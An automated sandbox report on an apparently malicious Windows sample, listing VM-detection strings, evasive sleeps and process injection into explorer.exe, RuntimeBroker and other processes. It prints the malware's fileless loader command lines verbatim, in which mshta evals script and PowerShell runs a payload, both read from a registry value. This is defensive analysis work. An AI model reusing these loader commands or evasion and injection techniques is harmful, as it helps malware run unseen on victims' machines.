Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5790
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F87DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_00F87DD8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_0138E0BA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_0139888D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_013A4FE1
Source: C:\Windows\explorer.exe Code function: 32_2_04DEECE0 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose, 32_2_04DEECE0
Source: C:\Windows\explorer.exe Code function: 32_2_04DEB9E8 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 32_2_04DEB9E8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013905EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_013905EF
Source: explorer.exe, 00000020.00000000.563167011.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000020.00000000.563117443.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000020.00000000.558190996.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000020.00000000.557271197.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000000.569560718.0000021DB88C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000020.00000000.563117443.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: RuntimeBroker.exe, 00000023.00000002.708021051.0000021DB5A53000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000020.00000000.562859337.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000020.00000000.557271197.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000000.569560718.0000021DB88C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000020.00000000.557271197.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000000.569560718.0000021DB88C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000020.00000000.562859337.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000020.00000000.563167011.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000020.00000002.707268029.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 00000020.00000000.557271197.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000000.569560718.0000021DB88C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01385BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_01385BD5
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A16A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_013A16A5
Source: C:\Windows\System32\loaddll32.exe Memory protected: page execute read | page guard

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: B90000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 21912DC0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 20675470000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 88E31580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 88E31580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 88E31580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 88E31580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 5DA000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 2980000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3440 base: 7FFD88E31580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 6328
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3440
Source: C:\Windows\explorer.exe Thread register set: target process: 3092
Source: C:\Windows\explorer.exe Thread register set: target process: 4252
Source: C:\Windows\explorer.exe Thread register set: target process: 4572
Source: C:\Windows\explorer.exe Thread register set: target process: 5708
Source: C:\Windows\System32\control.exe Thread register set: target process: 3440
Source: C:\Windows\System32\control.exe Thread register set: target process: 6440
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7C8C212E0
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: B90000
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7C8C212E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 5DA000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2980000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 515ACF8000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 789A648000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21912DC0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF6EB295FD0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 20675470000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF6EB295FD0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9BB5.tmp' 'c:\Users\user\AppData\Local\Temp\f1lrerxf\CSC9A4B28F2F0C74BBFAD6D775E23C8FA61.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESAC30.tmp' 'c:\Users\user\AppData\Local\Temp\ntdrbunx\CSC5967AF4362DF4FAC8293E16849360B0.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000020.00000002.723657372.0000000004F80000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000020.00000002.706975872.00000000008B8000.00000004.00000020.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000020.00000000.543025463.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000020.00000000.543025463.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.708613884.0000021DB5F90000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F88B98 cpuid 0_2_00F88B98
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_10001B13
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139B585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0139B585
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_10001000
